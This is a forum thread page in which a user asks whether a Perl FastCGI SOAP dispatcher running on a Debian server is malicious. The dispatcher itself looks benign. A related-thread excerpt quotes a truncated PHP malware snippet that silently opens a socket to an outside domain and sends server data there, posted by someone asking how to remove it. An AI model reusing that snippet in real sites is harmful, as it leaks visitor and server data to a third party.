Malicious perl script Post: 302992334

Sponsored Content

Operating Systems Linux Debian Malicious perl script Post 302992334 by dadprpus on Thursday 23rd of February 2017 08:54:33 PM

02-23-2017

Registered User

tried to do the

Code:

1s -1 /proc/4600

and the other. Terminal said there was no such thing as 1s. I am using -bash: in front of everything but the| grep perl revealed 2 instances of perl.
usr/bin/perl and usr/sbin/hspc-plugin-rpc.fcgi which contained

Code:

use strict;
use CGI::Fast();

use Pod::WSDL;
use SOAP::Lite;
use SOAP::Transport::HTTP;

use HSPC::Config;
use HSPC::Plugin::SOAP::Common;
use HSPC::Plugin::SOAP::Struct;
use HSPC::Plugin::SOAP::PP;

$ENV{"plugin_soap_common"} = HSPC::Plugin::SOAP::Common->new();

my $remote_uri = "https://".$CONFIG{"SERVER_NAME"}.":".$CONFIG{"SERVER_PORT"}."/HSPC/Plugin/SOAP";
my $local_uri = "https://127.0.0.1:".$CONFIG{"SERVER_PORT"}."/HSPC/Plugin/SOAP";

my $cgi = SOAP::Transport::HTTP::FCGI
	-> dispatch_with({
		$remote_uri."/WebServices"	=> "HSPC::Plugin::SOAP::WebServices",
		$local_uri."/WebServices"	=> "HSPC::Plugin::SOAP::WebServices",
		$remote_uri."/Common"		=> "HSPC::Plugin::SOAP::Common",
		$local_uri."/Common"		=> "HSPC::Plugin::SOAP::Common",
		$remote_uri."/PP"			=> "HSPC::Plugin::SOAP::PP",
		$local_uri."/PP"			=> "HSPC::Plugin::SOAP::PP",
		$remote_uri."/PM"			=> "HSPC::Plugin::SOAP::PM",
		$local_uri."/PM"			=> "HSPC::Plugin::SOAP::PM",
		$remote_uri."/DM"			=> "HSPC::Plugin::SOAP::DM",
		$local_uri."/DM"			=> "HSPC::Plugin::SOAP::DM",
	})
	-> handle
;

0;

I have no idea if this is suppose to be here or not.

dadprpus

View Public Profile for dadprpus

Find all posts by dadprpus

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ...

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated...

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -...

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl...

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"...

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not...

LEARN ABOUT DEBIAN

soap::deserializer

SOAP::Deserializer(3pm) 				User Contributed Perl Documentation				   SOAP::Deserializer(3pm)

NAME

       SOAP::Deserializer - the means by which the toolkit manages the conversion of XML into an object manageable by a developer

DESCRIPTION

       SOAP::Deserializer provides the means by which incoming XML is decoded into a Perl data structure.

METHODS

       context
	   This provides access to the calling context of "SOAP::Deserializer". In a client side context the often means a reference to an
	   instance of SOAP::Lite. In a server side context this means a reference to a SOAP::Server instance.

EXAMPLES

   DESERIALIZING RAW XML INTO A SOAP::SOM OBJECT
       A useful utility for SOAP::Deserializer is for parsing raw XML documents or fragments into a SOAP::SOM object. SOAP::Lite developers use
       this technique to write unit tests for the SOAP::Lite module itself. It is a lot more efficient for testing aspects of the toolkit than
       generating client calls over the network. This is a perfect way for developers to write unit tests for their custom data types for example.

       Here is an example of how raw XML content can be parsed into a SOAP::SOM object by using SOAP::Deserializer:

	   $xml = <<END_XML;
	   <foo>
	     <person>
	       <foo>123</foo>
	       <foo>456</foo>
	     </person>
	     <person>
	       <foo>789</foo>
	       <foo>012</foo>
	     </person>
	   </foo>
	   END_XML

	   my $som = SOAP::Deserializer->deserialize($xml);

COPYRIGHT

       Copyright (C) 2000-2004 Paul Kulchenko. All rights reserved.

       This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself.

AUTHORS

       Byrne Reese (byrne@majordojo.com)

perl v5.12.4							    2010-06-03						   SOAP::Deserializer(3pm)